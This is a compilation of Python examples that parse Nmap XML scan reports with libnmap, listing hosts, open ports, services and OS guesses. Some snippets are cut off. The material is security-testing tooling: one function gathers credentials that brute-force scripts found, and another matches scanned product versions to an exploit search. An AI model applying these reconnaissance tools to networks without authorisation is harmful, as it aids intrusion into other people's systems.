            {'line': -1, 'accuracy': 95, 'name': 'general purpose:Linux:Linux'},
            {'line': -1, 'accuracy': 90, 'name': 'WAP:Gemtek:embedded'},
            {'line': -1, 'accuracy': 89, 'name': 'general purpose:Nokia:Linux'},
            {'line': -1, 'accuracy': 88, 'name': 'webcam:AXIS:Linux'},
        ]

        for position, osmatch in enumerate(host.os.osmatches):
            actual = {'line': osmatch.line, 'accuracy': osmatch.accuracy,
                      'name': osmatch.name}
            self.assertEqual(expected[position], actual)
Ejemplo n.º 23
 def diff_reports(self, first_rep=-1, second_rep=-2, fresh_scan=False, test_for_debug=False):
     '''
     Diff two Nmap reports, print the diff and store self.diff in the DB.

     :param first_rep: index of the first report in the list read from the DB
     :param second_rep: index of the second report in the list read from the DB
     :param fresh_scan: run a new scan before reading the reports
     :param test_for_debug: diff two sample reports shipped with libnmap
         instead of reports from the DB
     :return: None
     '''
     if not test_for_debug:
         wrapper = NmapWrapper()
         if fresh_scan:
             wrapper.launch()
         stored = wrapper.get_all_reports()
         # Element [1] of each stored entry is passed on as the report.
         newer = stored[first_rep][1]
         older = stored[second_rep][1]
         self.print_diff(newer, older)
     else:
         print('#################TEST_FOR_DEBUG#########################')
         # NOTE(review): absolute, machine-specific paths; this branch only
         # works where libnmap is installed under C:\Python34.
         newrep = NmapParser.parse_fromfile('C:\\Python34\\Lib\\site-packages\\libnmap\\test\\files\\2_hosts_achange.xml')
         oldrep = NmapParser.parse_fromfile('C:\\Python34\\Lib\\site-packages\\libnmap\\test\\files\\1_hosts.xml')
         self.print_diff(newrep, oldrep)
     self.write_to_db(self.diff)
Ejemplo n.º 24
def parse_weak_pass_file(path, stat):
    """Collect script results that report a successful login from an Nmap XML file.

    A script result counts when its output contains 'Valid credentials' or
    'Login Success'. For each hit, stat.host_weak is incremented, a text line
    is appended to stat.weak_list and a weak_pass_node is added to the
    returned list. Any exception is logged with its traceback and the results
    gathered so far are returned.
    """
    result_lst = []
    try:
        report = NmapParser.parse_fromfile(path)
        for host in report.hosts:
            for svc in host.services:
                for script in svc.scripts_results:
                    output = script.get('output')
                    if not output:
                        continue
                    if 'Valid credentials' not in output and 'Login Success' not in output:
                        continue
                    # NOTE(review): the script output is stored verbatim and
                    # presumably includes the credentials that were found, so
                    # weak_list and the returned nodes should be handled as
                    # sensitive data.
                    stat.host_weak = stat.host_weak + 1
                    stat.weak_list.append('\n{}:{}{}'.format(host.address, svc.port, output))
                    node = weak_pass_node(stat.host_weak, host.address, host.address,
                                          svc.service, svc.port, svc.protocol,
                                          script.get('id'), script.get('output'))
                    result_lst.append(node)
    except Exception:
        logging.error('Error in parse_weak_pass_file\n' + traceback.format_exc())
    return result_lst
Ejemplo n.º 25
def parse_xml(filepath):
    '''Parse an Nmap XML file, print its statistics and return the report.

    Returns 0 (not None) after printing a message when the file cannot be
    parsed, so callers must check for that value before using the result.
    '''
    try:
        report = NmapParser.parse_fromfile(filepath)
    except TypeError:
        # NOTE(review): the message says IOError but the handler catches
        # TypeError; confirm which exception an unreadable file raises.
        print "[!] IOError : Cannot read from the file. Try again."
        return 0
    except NmapParserException:
        print "[!] Bad XML file. The scan was probably interrupted."
        return 0
    else:
        _stats(report)
        return report
Ejemplo n.º 26
def parse_unique_services(files):
    """Return the sorted, de-duplicated names of all open services in *files*.

    A service reached through a tunnel is listed as "<tunnel>/<service>".
    Any exception is reported through error() and ends the process.
    """
    try:
        names = set()
        for xml_path in files:
            report = NmapParser.parse_fromfile(xml_path)
            for host in report.hosts:
                for svc in host.services:
                    # The label is built before the state check, as in the
                    # original, so a bad value fails the same way.
                    label = svc.service
                    if svc.tunnel:
                        label = svc.tunnel + "/" + label
                    if svc.state != "open":
                        continue
                    names.add(label)
        return sorted(names)
    except Exception as e:
        error("Error parsing xml file! %s" % e)
        exit()
Ejemplo n.º 27
def parse_hosts(files, check_ports=False):
    """Return the sorted addresses of all hosts that are up in *files*.

    With check_ports set, a host is only listed when it also has at least one
    open port. Any exception is reported through error() and ends the process.
    """
    try:
        live = set()
        for xml_path in files:
            report = NmapParser.parse_fromfile(xml_path)
            for host in report.hosts:
                if not host.is_up():
                    continue
                if check_ports and not len(host.get_open_ports()) > 0:
                    continue
                live.add(host.address)
        return sorted(live)
    except Exception as e:
        error("Error parsing xml file! %s" % e)
        exit()
Ejemplo n.º 28
def parse_ports_for_address(files, address):
    """Return the sorted "<port>/<protocol>" strings of the open ports of one host.

    Only hosts whose address equals *address* are considered. Sorting is
    textual, so "80/tcp" comes after "443/tcp". Any exception is reported
    through error() and ends the process.
    """
    try:
        open_ports = set()
        for xml_path in files:
            report = NmapParser.parse_fromfile(xml_path)
            for host in report.hosts:
                if not address == host.address:
                    continue
                for svc in host.services:
                    if svc.state != "open":
                        continue
                    open_ports.add(str(svc.port) + "/" + str(svc.protocol))
        return sorted(open_ports)
    except Exception as e:
        error("Error parsing xml file! %s" % e)
        exit()
Ejemplo n.º 29
def parse_service(files, regex):
    """Return the sorted "<address>:<port>" of open services whose name matches *regex*.

    The name is "<tunnel>/<service>" for tunnelled services and 'unknown'
    when the report has no service name. *regex* is anchored at both ends and
    matched case-insensitively. Any exception is reported through error() and
    ends the process.
    """
    try:
        matches = set()
        # NOTE(review): the pattern is used as given; if it can come from an
        # untrusted source, a costly expression can stall this loop.
        anchored = "^" + regex + "$"
        for xml_path in files:
            report = NmapParser.parse_fromfile(xml_path)
            for host in report.hosts:
                for svc in host.services:
                    label = svc.service
                    if not label:
                        label = 'unknown'
                    if svc.tunnel:
                        label = svc.tunnel + "/" + label
                    if svc.state != "open":
                        continue
                    if re.search(anchored, label, re.IGNORECASE):
                        matches.add(host.address + ":" + str(svc.port))
        return sorted(matches)
    except Exception as e:
        error("Error parsing xml file! %s" % e)
        exit()
Ejemplo n.º 30
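    def urls_from_nmap_xml(nmap_file):
        """Build base URLs for every open HTTP(S) service in an Nmap XML report.

        Returns None when *nmap_file* does not exist, otherwise a list of
        "<scheme>://<host>:<port>/" strings. Each service yields a URL for the
        host's address and, when the report has a hostname, a second URL for
        that hostname.
        """
        if not path.exists(nmap_file):
            return

        report = NmapParser.parse_fromfile(nmap_file)
        urls = []

        for host in report.hosts:
            # Skip hosts with errors (any address that contains ':').
            if ':' in host.address:
                continue

            # Take the last hostname without pop(), so the parsed report is
            # not modified as a side effect.
            tmp_host = host.hostnames[-1] if host.hostnames else host.address

            for serv in host.services:
                # A service without a name is treated as an empty string.
                svc = (serv.service or '').lower()
                if serv.state != 'open' or 'http' not in svc:
                    continue

                # The old test was `if svc.find('ssl'):`. str.find() returns
                # -1 (truthy) when the text is absent, so plain HTTP services
                # were labelled https. TLS is now detected from the service
                # name or from the tunnel reported by nmap.
                if 'https' in svc or 'ssl' in svc or serv.tunnel == 'ssl':
                    proto = 'https'
                else:
                    proto = 'http'

                urls.append('%s://%s:%i/' % (proto, host.address, serv.port))
                if tmp_host != host.address:
                    urls.append('%s://%s:%i/' % (proto, tmp_host, serv.port))
        return urls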
Ejemplo n.º 31
from pprint import pprint
from libnmap.parser import NmapParser

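# Print one "name: port,port,..." line per host in the parsed report.
report = NmapParser.parse_fromfile('./out.xml2')
for host in report.hosts:
    # Hosts scanned by address may have no hostname at all; fall back to the
    # address instead of raising IndexError on hostnames[0].
    label = host.hostnames[0] if host.hostnames else host.address
    # Element 0 of each get_open_ports() entry is used as the port number.
    ports = [str(port[0]) for port in host.get_open_ports()]
    # A single print call gives the same line under Python 2 and Python 3.
    print(label + ': ' + ','.join(ports))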
Ejemplo n.º 32
 def test_osclasses_new(self):
     """Compare each parsed OS class of two "nv6" fixture hosts with expected values.

     The expected data is indexed as ``expected[host][osmatch][osclass]``,
     with hosts in the order they are popped from the end of the report's
     host list.
     """

     def os_class(kind, vendor, family, generation):
         # Every expected class in this fixture carries accuracy 100.
         return {
             "type": kind,
             "accuracy": 100,
             "vendor": vendor,
             "osfamily": family,
             "osgen": generation,
         }

     def windows(generation, kind="general purpose"):
         return os_class(kind, "Microsoft", "Windows", generation)

     expected = [
         # First popped host: a single OS match with three classes.
         [[
             os_class("general purpose", "Apple", "Mac OS X", "10.8.X"),
             os_class("phone", "Apple", "iOS", "5.X"),
             os_class("media device", "Apple", "iOS", "5.X"),
         ]],
         # Second popped host: five OS matches.
         [
             [windows("2008")],
             [windows("7")],
             [windows("Phone", kind="phone")],
             [windows("Vista"), windows("2008"), windows("7")],
             [windows("Vista"), windows("7"), windows("2008")],
         ],
     ]

     report = NmapParser.parse_fromfile(self.flist_os["nv6"]["file"])
     popped_hosts = [report.hosts.pop(), report.hosts.pop()]

     for host_idx, host in enumerate(popped_hosts):
         for match_idx, os_match in enumerate(host.os.osmatches):
             for class_idx, parsed_class in enumerate(os_match.osclasses):
                 parsed = {
                     "type": parsed_class.type,
                     "accuracy": parsed_class.accuracy,
                     "vendor": parsed_class.vendor,
                     "osfamily": parsed_class.osfamily,
                     "osgen": parsed_class.osgen,
                 }
                 self.assertEqual(
                     expected[host_idx][match_idx][class_idx], parsed)
Ejemplo n.º 33
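def _collect_open_ports(nmap_report):
    """Map each up host's address to ``{port: {protocol, service, state}}`` for its open ports."""
    final_data = {}
    for _host in nmap_report.hosts:
        if not _host.is_up():
            continue
        final_data[_host.address] = {
            s.port: {
                "protocol": s.protocol,
                "service": s.service,
                "state": s.state
            }
            for s in _host.services if s.state == 'open'
        }
    return final_data


def outproc(xml_val=''):
    """Turn Nmap XML into ``{address: {port: {...}}}`` for up hosts and open ports.

    :param xml_val: raw XML text from a scan. When empty, the user is asked
        for an XML file instead (typed path, or a file dialog on plain Enter)
        and the parsed report is also passed to ``print_scan``.
    :return: dict keyed by host address; each value maps an open port to its
        protocol, service and state.

    The process exits when ``xml_val`` cannot be parsed.
    """
    xml_filetypes = (("XML Files", "*.xml"), ("All Files", "*.*"))

    if xml_val != '':  # Data is coming straight from a scan
        try:
            nmap_report = NmapParser.parse(xml_val)
        except ValueError:
            print(xml_val)
            print(
                "\n The program was not able to process the output properly... \n"
            )
            exit(0)
        except libnmap.parser.NmapParserException:
            print(
                "Something went wrong with the scan and a proper XML report was not generated \n"
            )
            restore = input(
                "We can try to restore the xml output \n Please enter the path where you would like to save the XML file: \n >"
            )
            if restore == '':
                tkwindow = tkinter.Tk()
                tkwindow.withdraw()  # Used to Hide the tkinter window.
                # asksaveasfilename returns a path; the earlier asksaveasfile
                # call returned an open file object, which was then handed to
                # the parser as if it were a path.
                restore = filedialog.asksaveasfilename(
                    initialdir="/",
                    title="Save Your File",
                    filetypes=xml_filetypes)
            if restore:
                # Keep the raw scanner output so it can be inspected later.
                # Assumes xml_val is text, as it was passed to NmapParser.parse.
                with open(restore, 'w') as raw_out:
                    raw_out.write(xml_val)
                print("XML File Selected: ", restore)
            # No report was parsed on this path, so there is nothing to
            # summarise. Previously execution fell through to code that read
            # an unassigned nmap_report.
            exit(0)
        return _collect_open_ports(nmap_report)

    # No scan data was given: read the report from a file chosen by the user.
    outfile = input(
        "Enter Path to XML File (Press Enter Key To Browse Your PC): ")
    if outfile == '':
        tkwindow = tkinter.Tk()
        tkwindow.withdraw()  # Used to Hide the tkinter window.
        while True:
            try:
                filename = filedialog.askopenfilename(
                    initialdir="/",
                    title="Select Your File",
                    filetypes=xml_filetypes)
                nmap_report = NmapParser.parse_fromfile(filename)
            except ValueError:
                # NOTE(review): only ValueError restarts the dialog; confirm
                # which exception the parser raises for a cancelled dialog or
                # a file that is not Nmap XML.
                print(
                    "An error was detected. Was the selected file correct? \n"
                )
            else:
                # Report the file that was actually chosen (outfile is empty here).
                print("XML File Selected: ", filename)
                break
    else:
        try:
            nmap_report = NmapParser.parse_fromfile(outfile)
        except ValueError:
            print(
                "An error was detected. Was the selected file correct? \n")
            # Ask again and hand back that result; continuing here would read
            # an nmap_report that was never assigned.
            return outproc()
        print("XML File Selected: ", outfile)

    final_data = _collect_open_ports(nmap_report)
    print_scan(nmap_report)
    return final_data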
Ejemplo n.º 34
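def run_cmd(command_name,
            populated_command,
            celery_path,
            task_id,
            path=None,
            process_domain_tuple=None,
            process_nmap=None,
            output_file=None):
    """Run a prepared shell command, record its status and post-process its output.

    :param command_name: label written to the audit log next to the command.
    :param populated_command: full command line, executed through the shell.
    :param celery_path: base directory; the audit log is
        ``<celery_path>/log/cmdExecutionAudit.log``.
    :param task_id: id passed to the ``db.update_task_status_*`` calls.
    :param path: not used by this function.
    :param process_domain_tuple: when truthy, the output is passed to
        ``lib.scan.determine_if_domains_are_in_scope``; otherwise it goes to
        the generic URL extractor.
    :param process_nmap: when truthy, ``<output_file>.xml`` is parsed and
        imported into the current workspace.
    :param output_file: path prefix of the Nmap XML output (see process_nmap).
    :return: the command's captured stdout, or None when the command could
        not be run to completion.
    """
    audit_log = celery_path + "/log/cmdExecutionAudit.log"
    start_time = time.time()
    start_time_int = int(start_time)
    start_ctime = time.ctime(start_time)
    start = timer()

    print(populated_command)

    out = None
    # The context manager closes the audit log even if a status update raises.
    with open(audit_log, 'a') as f:
        # The original author notes that killing the process from the Linux
        # CLI does not reach the except branch.
        try:
            # NOTE(security): shell=True hands populated_command to the shell
            # unmodified. Every value substituted into it (hosts, domains,
            # file names) must be validated or quoted by the caller, or a
            # crafted value can run extra commands. Only stdout is captured;
            # stderr is not piped.
            p = Popen(populated_command, shell=True, stdout=PIPE, stdin=PIPE)
            # NOTE(review): p.pid is the shell's pid; pid + 1 is only a guess
            # at the child process and is not guaranteed by the OS.
            pid = p.pid + 1
            db.update_task_status_started("STARTED", task_id, pid,
                                          start_time_int)
            out, _ = p.communicate()
            run_time = timer() - start
            # Take the wall-clock end time from time itself: timer() is not
            # shown here and may be a performance counter, which time.ctime()
            # would render as a meaningless date.
            end_ctime = time.ctime()
            db.update_task_status_completed("COMPLETED", task_id, run_time)
            # NOTE(review): the full command line is written to the audit log
            # as-is; if commands can carry credentials, restrict who can read
            # this file.
            f.write("\n" + str(start_ctime) + "\t" + str(end_ctime) + "\t" +
                    str("{:.2f}".format(run_time)) + "\t" + command_name +
                    "\t" + populated_command)
        except Exception:
            run_time = timer() - start
            db.update_task_status_error("FAILED", task_id, run_time)

    if out is None:
        # Nothing was captured, so there is nothing to post-process. The
        # earlier code reached the calls below with `out` unassigned and
        # failed with a NameError instead.
        return out

    if process_domain_tuple:
        lib.scan.determine_if_domains_are_in_scope(out, process_domain_tuple)
    else:
        # URLs are extracted from scan tool output only, not from the output
        # of subdomain tools.
        parsers.generic_urlextract.extract_in_scope_urls_from_task_output(out)

    if process_nmap:
        nmap_xml = output_file + ".xml"
        nmap_report = NmapParser.parse_fromfile(nmap_xml)
        workspace = lib.db.get_current_workspace()[0][0]
        lib.csimport.process_nmap_data(nmap_report, workspace)
    return out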
Ejemplo n.º 35
def validate_nmap(file):
    """Parse the Nmap XML found at the current working directory plus ``file``.

    The parsed report is discarded and nothing is returned; a parser error
    propagates to the caller. The path is built by plain concatenation, so
    ``file`` presumably starts with a path separator -- confirm against callers.
    """
    working_dir = os.getcwd()
    report_path = working_dir + file
    NmapParser.parse_fromfile(report_path)
Ejemplo n.º 36
def read_hosts_from_file(nmapxmlfile):
    '''
    Log the file name at INFO level, then parse the Nmap XML file and return
    whatever NmapParser.parse_fromfile produces for it.
    '''
    message = 'Reading hosts from file: ' + str(nmapxmlfile)
    logger.info(message)
    parsed_report = NmapParser.parse_fromfile(nmapxmlfile)
    return parsed_report
Ejemplo n.º 37
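def _is_plain_log_name(filename):
    """Return True only for a bare file name with no directory component."""
    return (filename not in ('', '.', '..') and '/' not in filename
            and '\\' not in filename and '\x00' not in filename)


def _render_scan_failure(request):
    """Render the scanner start page with the 'wrong' flag after a failed parse."""
    context = {
        'serverip': SSHCred.objects.filter(servertype='scanning'),
        'list_timestamp': gettimestamp(sorted_ls(os.getcwd() + '/scannerlogs')),
        'wrong': 'wrong'
    }
    return render(request, 'scanner/networkscanner.html', context)


def details(request, filename):
    """Render the parsed results of one stored scan log from ``scannerlogs/``.

    Logs whose name contains "nmap" are rendered host by host (hostnames,
    address, OS guesses, services, states, ports, banners). Any other log is
    treated as masscan output: ports are grouped per address and the address
    and port lists are stored in the session.

    An empty, missing or rejected file renders ``scanner/details.html`` with
    an ``error`` flag; a parse failure renders the scanner start page with a
    ``wrong`` flag.
    """
    # `filename` reaches this view from the request (presumably captured from
    # the URL). Accept only a bare file name so a value such as "../x" cannot
    # make the view read outside scannerlogs/.
    if not _is_plain_log_name(filename):
        return render(request, 'scanner/details.html', {'error': 'error'})

    log_path = os.path.join('scannerlogs', filename)
    try:
        is_empty = os.path.getsize(log_path) == 0
    except OSError:
        # A missing or unreadable log is reported like an empty one instead
        # of surfacing as an unhandled exception.
        is_empty = True
    if is_empty:
        return render(request, 'scanner/details.html', {'error': 'error'})

    if "nmap" in filename:
        try:
            rep = NmapParser.parse_fromfile(log_path)

            list_host = []
            list_ip = []
            osname = []
            service = []
            state = []
            port = []
            banner = []

            for host in rep.hosts:
                list_host.append(', '.join(host.hostnames))
                list_ip.append(host.address)

                if host.os.osmatches:
                    osname.append([
                        osmatch.name + ' ---- ' + str(osmatch.accuracy) + '%'
                        for osmatch in host.os.osmatches
                    ])
                else:
                    osname.append(["None"])

                service.append([svc.service for svc in host.services])
                state.append([svc.state for svc in host.services])
                port.append([svc.port for svc in host.services])
                banner.append([
                    svc.banner if svc.banner else "None"
                    for svc in host.services
                ])

            # One zero-based index per host, zipped in alongside its data.
            counter = list(range(len(list_host)))

            # NOTE(review): hostnames and banners come from the scanned
            # network; the template should rely on autoescaping and never
            # mark them safe.
            foo = zip(list_host, list_ip, osname, service, state, port, banner,
                      counter)
            two = zip(service, state, port)

            context = {'type': "nmap", 'lists': foo, 'list': two}
            return render(request, 'scanner/details.html', context)

        except Exception:
            return _render_scan_failure(request)

    else:
        try:
            rep = NmapParser.parse_fromfile(log_path)

            results = {}
            iplist2 = []

            for host in rep.hosts:
                ip = host.address
                ports = results.setdefault(ip, [])
                # Record every service port of this host entry. The earlier
                # loop kept only the last one and reused the previous host's
                # port when an entry had no services.
                ports.extend(svc.port for svc in host.services)
                ports.sort()

                if ip not in iplist2:
                    iplist2.append(ip)

            request.session['listofip'] = iplist2
            unique = []

            for key, value in results.items():
                for i in value:
                    if i not in unique:
                        unique.append(i)
                results[key] = ', '.join(str(e) for e in value)

            request.session['listofports'] = unique

            serverip = SSHCred.objects.filter(servertype='scanning')
            api_keys = ApiKey.objects.filter(type__type_name='Shodan')

            context = {
                'results': results,
                'serverip': serverip,
                'type': "masscan",
                'apikey': api_keys
            }
            return render(request, 'scanner/details.html', context)
        except Exception:
            return _render_scan_failure(request)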
Ejemplo n.º 38
def logparser(ip, protocol):
    """Print the host, OS guess and per-service details of a stored Nmap XML scan.

    Reads ./results/<ip>/<ip><protocol>_nmap_scan_import.xml twice: once with
    ElementTree (for the product/version/extrainfo attributes of every
    <service> element) and once with libnmap's NmapParser (hosts, OS matches,
    services). For every service of the last host in the report it prints one
    line and calls findsploit(product, version), which is defined elsewhere.

    NOTE(review): the Python documentation warns that xml.etree.ElementTree
    is not secure against maliciously constructed data, and the product /
    version / extrainfo strings originate from the scanned services. They are
    printed to the terminal and passed to findsploit() unmodified -- treat
    them as untrusted input.
    """
    from xml.etree import ElementTree
    from libnmap.parser import NmapParser

    with open('./results/{0}/{0}{1}_nmap_scan_import.xml'.format(ip, protocol),
              'rt') as file:  #ElementTree module is opening the XML file
        tree = ElementTree.parse(file)

    rep = NmapParser.parse_fromfile(
        './results/{0}/{0}{1}_nmap_scan_import.xml'.format(
            ip, protocol))  #NmapParse module is opening the XML file
    #For loop used by NmapParser to print the hostname and the IP
    for _host in rep.hosts:
        host = ', '.join(_host.hostnames)
        # Rebinds the `ip` parameter; the error message at the end of the
        # function therefore shows the last host's address.
        ip = (_host.address)

        # The format string only has a {0} field, so "--" and ip are passed
        # but never printed.
        print "\033[1;32m[+]\033[1;37m  HostName: " '{0: >35}\033[1;m'.format(
            host, "--", ip)

    #Lists in order to store Additional information, Product and version next to the port information.
    # They cover every <service> element in the file, in document order.
    list_product = []
    list_version = []
    list_extrainf = []
    for node_4 in tree.iter(
            'service'
    ):  #ElementTree manipulation. Service Element which included the sub-elements product, version, extrainfo
        product = node_4.attrib.get('product')
        version = node_4.attrib.get('version')
        extrainf = node_4.attrib.get('extrainfo')
        list_product.append(product)
        list_version.append(version)
        list_extrainf.append(extrainf)

    # From here on `_host` is whatever the loop above left behind, i.e. the
    # last host in the report. `os` is a local string in this function.
    try:
        for osmatch in _host.os.osmatches:  #NmapParser manipulation to detect OS and accuracy of detection.
            os = osmatch.name
            accuracy = osmatch.accuracy
            print "\033[1;32m[+]\033[1;37m  Operating System Guess: \033[1;m", os, "\033[1;37m- Accuracy Detection\033[1;m", accuracy
            break
    except:
        # Any failure above (including `_host` being unset because the report
        # had no hosts) falls back to treating the target as "Microsoft".
        os = "Microsoft"
        print "\033[1;32m[+]\033[1;37m  ----------------------------------------------------------------------------- \033[1;m"
    # If the OS loop above ran without error but found no match, `os` is still
    # unassigned here; the resulting error is swallowed by the bare except
    # below and reported as a parsing problem.
    try:
        if protocol == 'UDP':
            os = 'UDP'
        # The three branches below are independent `if`s and differ only in
        # the column widths of the printed fields. list_* are indexed by the
        # position of the service within _host.services -- this assumes the
        # <service> elements line up with that list; TODO confirm for reports
        # with more than one host.
        if 'Microsoft' in os:
            counter = 0
            for services in _host.services:  #NmapParser manipulation to list services, their ports and their state. The list elements defined above are printed next to each line.
                #print "Port: "'{0: <5}'.format(services.port), "Product: "'{0: <15}'.format(list_product[counter],list_version[counter],list_extrainf[counter]), "State: "'{0: <5}'.format(services.state), "Protocol: "'{0: <5}'.format(services.protocol)
                print "\033[1;32m[+]\033[1;37m  Port: " '{0: <5}\033[1;m'.format(
                    services.port
                ), "\033[1;37mState: " '{0: <5}\033[1;m'.format(
                    services.state
                ), "\033[1;37mProtocol: " '{0: <2}\033[1;m'.format(
                    services.protocol
                ), "\033[1;37mProduct: " '{0: <15}\033[1;m'.format(
                    list_product[counter]
                ), "\033[1;37mVersion: " '{0: <15}\033[1;m'.format(
                    list_version[counter]
                ), "\033[1;37mExtrInfo: " '{0: <10}\033[1;m'.format(
                    list_extrainf[counter])
                findsploit(list_product[counter], list_version[counter])
                counter = counter + 1

        if 'Linux' in os:
            counter = 0
            for services in _host.services:  #NmapParser manipulation to list services, their ports and their state. The list elements defined above are printed next to each line.
                #print "Port: "'{0: <5}'.format(services.port), "Product: "'{0: <15}'.format(list_product[counter],list_version[counter],list_extrainf[counter]), "State: "'{0: <5}'.format(services.state), "Protocol: "'{0: <5}'.format(services.protocol)
                print "\033[1;32m[+]\033[1;37m  Port: " '{0: <5}\033[1;m'.format(
                    services.port
                ), "\033[1;37mState: " '{0: <5}\033[1;m'.format(
                    services.state
                ), "\033[1;37mProtocol: " '{0: <2}\033[1;m'.format(
                    services.protocol
                ), "\033[1;37mProduct: " '{0: <15}\033[1;m'.format(
                    list_product[counter]
                ), "\033[1;37mVersion: " '{0: <15}\033[1;m'.format(
                    list_version[counter]
                ), "\033[1;37mExtrInfo: " '{0: <10}\033[1;m'.format(
                    list_extrainf[counter])
                findsploit(list_product[counter], list_version[counter])
                counter = counter + 1

        if 'UDP' in os:
            counter = 0
            for services in _host.services:  #NmapParser manipulation to list services, their ports and their state. The list elements defined above are printed next to each line.
                #print "Port: "'{0: <5}'.format(services.port), "Product: "'{0: <15}'.format(list_product[counter],list_version[counter],list_extrainf[counter]), "State: "'{0: <5}'.format(services.state), "Protocol: "'{0: <5}'.format(services.protocol)
                print "\033[1;32m[+]\033[1;37m  Port: " '{0: <5}\033[1;m'.format(
                    services.port
                ), "\033[1;37mState: " '{0: <15}\033[1;m'.format(
                    services.state
                ), "\033[1;37mProtocol: " '{0: <2}\033[1;m'.format(
                    services.protocol
                ), "\033[1;37mProduct: " '{0: <15}\033[1;m'.format(
                    list_product[counter]
                ), "\033[1;37mVersion: " '{0: <10}\033[1;m'.format(
                    list_version[counter]
                ), "\033[1;37mExtrInfo: " '{0: <10}\033[1;m'.format(
                    list_extrainf[counter])
                findsploit(list_product[counter], list_version[counter])
                counter = counter + 1
    except:
        # Bare except: every error raised while printing, including one raised
        # inside findsploit(), ends up as this single message.
        print(
            '\033[1;31m[-]  NMAP parsing script {0} had some errors or no ports were found.\033[1;m'
            .format(ip))
Ejemplo n.º 39
# Remaining command-line options; the parser and the earlier options are
# created before this excerpt.
parser.add_argument("-ap", "--allports", action="store_true",
                    help="add ports closed or filtered")
parser.add_argument("-a", "--all", action="store_true",
                    help="same as '-ah -ap'")
parser.add_argument("folder",
                    help="folder where nmap outputs are stored")
args = parser.parse_args()

# Folder holding the nmap output files, a running counter for the unique_id
# attribute of each node, and the root element of the generated document.
path=args.folder+"/"
uid=1
root = ET.Element("cherrytree")

# One top-level node per nmap XML report found in the folder.
for filename in os.listdir(path):
	if not filename.endswith('.xml'): continue
	try:
		rep = NmapParser.parse_fromfile(path+filename)
	except:
		# NOTE(review): a bare except skips any file that fails to load
		# without reporting why.
		continue

	# The node is named after the part of the file name before the first dot.
	node = ET.SubElement(root, "node", custom_icon_id="0", foreground="", is_bold="False", name=filename.split(".")[0], prog_lang="custom-colors", readonly="False", tags="", unique_id=str(uid))
	uid=uid+1

	# Attach the text of the matching "<name>.nmap" file, when there is one.
	try:
		with open(path+filename.split(".")[0]+".nmap") as f: s = f.read()
		ET.SubElement(node, "rich_text").text=s
	except EnvironmentError:
		print "Nmap file not found it won't be added"

	# Add a child node per host: hosts that are up with at least one service,
	# or every host when args.allhosts or args.all is set (the option behind
	# args.allhosts is defined outside this excerpt).
	for _host in rep.hosts:
		if (_host.is_up() and len(_host.services)>0) or args.allhosts or args.all:
			host = ET.SubElement(node, "node", foreground="", is_bold="False", name=_host.address, prog_lang="custom-colors", readonly="False", tags="", unique_id=str(uid))
Ejemplo n.º 40
def main():
    """Parse the command line, load the Nmap XML it names and pass the report to report_parser()."""
    cli_args = parse_args()
    nmap_xml_path = cli_args.nmapxml
    parsed_report = NmapParser.parse_fromfile(nmap_xml_path)
    report_parser(parsed_report)
Ejemplo n.º 41
    # Get all file names from the screenshots folder to search later.
    all_screenshot_files = [
        f for f in os.listdir(path + "screenshots/")
        if os.path.isfile(path + "screenshots/" + f)
    ]
    all_tool_output_files = []
    # Get all file names from the other tool output folders to search later.
    #for tool_folder in os.listdir(path):
    #    if tool_folder <> "nmap" and tool_folder <> screenshot:
    #        all_tool_output_files += os.listdir(path+tool_folder+"/")

# Read all nmap files and write into tree object.
for filename in os.listdir(nmap_folder):
    if not filename.endswith('.xml'): continue
    try:
        rep = NmapParser.parse_fromfile(nmap_folder + filename)
    except:
        continue

    for _host in rep.hosts:
        if (_host.is_up()
                and len(_host.services) > 0) or args.allhosts or args.all:
            # If a node already exits for the host, use it, otherwise create one.
            try:
                host = node.findall('./node[@name="' + _host.address + '"]')[0]

            except:
                host = ET.SubElement(node,
                                     "node",
                                     foreground="",
                                     is_bold="False",
Ejemplo n.º 42
        exit()

    # now we need targets, either from file or xml
    targets = set()
    if args.targets:
        if not os.path.isfile(args.targets):
            error("Targets file '%s' does not exist!" % args.targets)
            exit()
        if not os.access(args.targets, os.R_OK):
            error("Targets file '%s' is not readable!" % args.targets)
            exit()
        with open(args.targets) as f:
            targets = [line.rstrip('\n') for line in f]
    elif args.files:
        for xml in args.files:
            parsed = NmapParser.parse_fromfile(xml)
            for host in parsed.hosts:
                if args.up and args.ports:
                    if host.is_up() and len(host.get_open_ports()) > 0:
                        targets.add(host.address)
                elif args.up:
                    if host.is_up():
                        targets.add(host.address)
                elif args.ports:
                    if len(host.get_open_ports()) > 0:
                        targets.add(host.address)
                else:
                    targets.add(host.address)
    else:
        error("Targets needed!")
        parser.print_help()
Ejemplo n.º 43
    #output = sorted(set(countlist))
    #print "Count: " + str(len(countlist))
    #print output[:-1]


def printsortedlistnewlineswithcountall(list):
    """Print the number of items, then one "item,count" line per item in sorted order.

    Duplicates are kept: an item that occurs n times is printed n times, each
    time with the count n.
    """
    ordered = sorted(list)
    rows = [str(item) + "," + str(ordered.count(item)) for item in ordered]
    print "Count: " + str(len(ordered))
    print "\n".join(rows)


# Load the Nmap XML report named by the first command-line argument.
nmap_report = NmapParser.parse_fromfile(sys.argv[1])
#print "Nmap scan summary: {0}".format(nmap_report.summary)

# Result accumulators, all empty at this point; the code that fills them is
# outside this excerpt.
openports = []
opentcp = []
openudp = []
openhosts = []

# Target layout for the combined rows, tab-separated, for example:
#PORT	PROTOCOL	SERVICE	VERSION
#443	tcp	ssl/http
openportprotoserviceversion = []
hostPort = []
servicePort = []
servicePortNoBanner = []
servicePortCount = []
Ejemplo n.º 44
            'IP Address', 'Port/Protocol', 'Domains', 'Operating System',
            'OS Version', 'Notes'
        ]
        writer = csv.DictWriter(csvwrite,
                                fieldnames=fieldnames,
                                dialect=csv.excel,
                                quoting=csv.QUOTE_ALL)

        # write CSV header
        writer.writeheader()

        # iterate through xml(s)
        for xml_report in nmap_xml_reports:
            try:
                # trying to load xml file
                nmap_report = NmapParser.parse_fromfile(xml_report)
                logger.info("%s host(s) loaded from %s" %
                            (len(nmap_report.hosts), xml_report))
            except Exception, e:
                logger.warn("XML file %s corrupted or format not recognized" %
                            xml_report)
                # keep looking for others xml
                continue

            # start a cumulative dictionary
            results = nmap_combine(nmap_report, results)
            #print "results: %s" % len(results)

        logger.info("Wraping up results")
        for ip_address in results:
            # colecting info for each field
Ejemplo n.º 45
def main():
    """Load the two sample reports from the libnmap test files and print their differences."""
    new_report_path = 'libnmap/test/files/2_hosts_achange.xml'
    old_report_path = 'libnmap/test/files/1_hosts.xml'

    newrep = NmapParser.parse_fromfile(new_report_path)
    oldrep = NmapParser.parse_fromfile(old_report_path)

